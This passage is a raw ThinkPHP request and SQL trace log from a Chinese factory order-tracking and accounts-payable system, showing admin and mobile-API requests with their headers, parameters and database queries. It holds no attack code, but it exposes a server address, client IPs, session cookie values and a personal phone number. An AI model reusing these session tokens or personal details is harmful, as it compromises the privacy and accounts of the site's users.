添加' , '{\"dialog\":\"1\",\"row\":{\"subject_type\":\"1\",\"suppliercustomer_id\":\"89\",\"worker_id\":\"\",\"explain\":\"\\u8fd0\\u8d39\",\"money\":\"134\"}}' , '/admin/financial/accountspayable/add?dialog=1' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.205.110' , 1658308343) [ RunTime:0.005241s ] --------------------------------------------------------------- [ 2022-07-20T17:12:23+08:00 ] 106.112.205.110 GET /admin/financial/accountspayable/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22subject_type%22%3A%220%22%7D&op=%7B%22subject_type%22%3A%22LIKE%22%7D&_=1658308318503 [ info ] 47.105.33.115:8081/admin/financial/accountspayable/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22subject_type%22%3A%220%22%7D&op=%7B%22subject_type%22%3A%22LIKE%22%7D&_=1658308318503 [运行时间:0.070887s][吞吐率:14.11req/s] [内存消耗:5,683.33kb] [文件加载:88] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000047s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001236s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'index', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/json', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'sort' => 'id', 'order' => 'desc', 'offset' => '0', 'limit' => '10', 'filter' => '{"subject_type":"0"}', 'op' => '{"subject_type":"LIKE"}', '_' => '1658308318503', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001561s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->index[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000100s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000594s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001391s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000419s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001061s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001073s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001532s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000510s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountspayable` [ RunTime:0.001487s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.001015s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_worker` [ RunTime:0.001246s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `accountspayable`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) ORDER BY `accountspayable`.`id` DESC LIMIT 1 [ RunTime:0.001164s ] [ sql ] [ SQL ] SELECT `accountspayable`.`id`,`accountspayable`.`money`,`accountspayable`.`paid_money`,`accountspayable`.`yu_money`,`accountspayable`.`subject_type`,`accountspayable`.`putinstorage_id`,`accountspayable`.`amount`,`accountspayable`.`suppliercustomer_id`,`accountspayable`.`sour_fac_id`,`accountspayable`.`staffinfo_id`,`accountspayable`.`build_staffinfo_id`,`accountspayable`.`orderinfo_id`,`accountspayable`.`purchaseorder_id`,`accountspayable`.`worker_id`,`accountspayable`.`worker_name`,`accountspayable`.`explain`,`accountspayable`.`year`,`accountspayable`.`month`,`accountspayable`.`day`,`accountspayable`.`factorymge_id`,`accountspayable`.`createtime`,`accountspayable`.`updatetime`,suppliercustomer.id AS suppliercustomer__id,suppliercustomer.name AS suppliercustomer__name,suppliercustomer.phone AS suppliercustomer__phone,suppliercustomer.receiving_address AS suppliercustomer__receiving_address,suppliercustomer.source_fac_id AS suppliercustomer__source_fac_id,suppliercustomer.normalstatus AS suppliercustomer__normalstatus,suppliercustomer.factorymge_id AS suppliercustomer__factorymge_id,suppliercustomer.createtime AS suppliercustomer__createtime,suppliercustomer.updatetime AS suppliercustomer__updatetime,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,worker.id AS worker__id,worker.name AS worker__name,worker.phone AS worker__phone,worker.IDcard AS worker__IDcard,worker.salary AS worker__salary,worker.factorymge_id AS worker__factorymge_id,worker.createtime AS worker__createtime,worker.updatetime AS worker__updatetime,worker.is_del AS worker__is_del FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `accountspayable`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) ORDER BY `accountspayable`.`id` DESC LIMIT 0,10 [ RunTime:0.002840s ] --------------------------------------------------------------- [ 2022-07-20T17:12:23+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021273s][吞吐率:47.01req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001066s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:24+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020469s][吞吐率:48.85req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001167s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:24+08:00 ] 221.192.178.45 POST /api/kuguan/order/getnotruorderbuid?staff_id=99&offset=4&pageNum=10 [ info ] 47.105.33.115:8081/api/kuguan/order/getnotruorderbuid?staff_id=99&offset=4&pageNum=10 [运行时间:0.052057s][吞吐率:19.21req/s] [内存消耗:4,757.58kb] [文件加载:76] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000045s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001058s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'kuguan.order', 2 => 'getnotruorderbuid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=kotd47fn3qlt2emign2nuin444', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '99', 'offset' => '4', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001537s ] [ info ] [ RUN ] app\api\controller\kuguan\Order->getnotruorderbuid[ /alidata/www/gendan/application/api/controller/kuguan/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000535s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001472s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 99 LIMIT 1 [ RunTime:0.000589s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001855s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001440s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`pid` = 0 AND `orderinfo`.`factorymge_id` = 40 AND ( orderinfo.order_status in ('1','2') ) AND ( orderinfo.order_type in ('1','2','3') ) AND ( `productinfo`.`name` LIKE '%%' OR `responsible_staffinfovars` LIKE '%%' ) AND ( orderinfo.produce_amount > 0 ) ORDER BY 1658308344>orderinfo.end_time desc,1658308344>orderinfo.end_time desc,1658308344-orderinfo.end_time + orderinfo.remind_day * 24*60*60 desc, orderinfo.updatetime desc LIMIT 40,10 [ RunTime:0.002689s ] --------------------------------------------------------------- [ 2022-07-20T17:12:25+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021468s][吞吐率:46.58req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000047s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001377s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:25+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021090s][吞吐率:47.42req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001194s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:25+08:00 ] 106.112.205.110 GET /admin/financial/accountspayable/choosecustom?dialog=1 [ info ] 47.105.33.115:8081/admin/financial/accountspayable/choosecustom?dialog=1 [运行时间:0.051005s][吞吐率:19.61req/s] [内存消耗:5,261.61kb] [文件加载:81] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000040s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001053s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'choosecustom', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'upgrade-insecure-requests' => '1', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'dialog' => '1', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001471s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->choosecustom[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ VIEW ] /alidata/www/gendan/public/../application/admin/view/financial/accountspayable/choosecustom.html [ array ( 0 => 'breadcrumb', 1 => 'site', 2 => 'config', 3 => 'auth', 4 => 'admin', 5 => 'adminid', 6 => 'faccount', 7 => 'subjectTypeList', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000126s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000587s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001468s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000528s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001063s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001080s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001600s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000409s ] --------------------------------------------------------------- [ 2022-07-20T17:12:25+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020884s][吞吐率:47.88req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000052s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001280s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:26+08:00 ] 106.112.205.110 GET /admin/ajax/lang?callback=define&controllername=financial.accountspayable&v=1658308345 [ info ] 47.105.33.115:8081/admin/ajax/lang?callback=define&controllername=financial.accountspayable&v=1658308345 [运行时间:0.033755s][吞吐率:29.63req/s] [内存消耗:3,854.64kb] [文件加载:72] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001172s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'ajax', 2 => 'lang', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/choosecustom?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'callback' => 'define', 'controllername' => 'financial.accountspayable', 'v' => '1658308345', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001650s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/ajax.php [ info ] [ RUN ] app\admin\controller\Ajax->lang[ /alidata/www/gendan/application/admin/controller/Ajax.php ] [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000106s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:26+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.019863s][吞吐率:50.35req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001111s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:26+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021776s][吞吐率:45.92req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000045s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001232s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:27+08:00 ] 106.112.205.110 GET /admin/financial/accountspayable/choosecustom?sort=id&order=desc&offset=0&limit=10&filter=%7B%7D&op=%7B%7D&_=1658308346106 [ info ] 47.105.33.115:8081/admin/financial/accountspayable/choosecustom?sort=id&order=desc&offset=0&limit=10&filter=%7B%7D&op=%7B%7D&_=1658308346106 [运行时间:0.069123s][吞吐率:14.47req/s] [内存消耗:5,683.36kb] [文件加载:88] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000045s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001145s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'choosecustom', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/json', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/choosecustom?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'sort' => 'id', 'order' => 'desc', 'offset' => '0', 'limit' => '10', 'filter' => '{}', 'op' => '{}', '_' => '1658308346106', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001629s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->choosecustom[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000151s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000377s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001428s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000457s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001146s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001264s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001509s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000334s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountspayable` [ RunTime:0.001160s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.000905s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_worker` [ 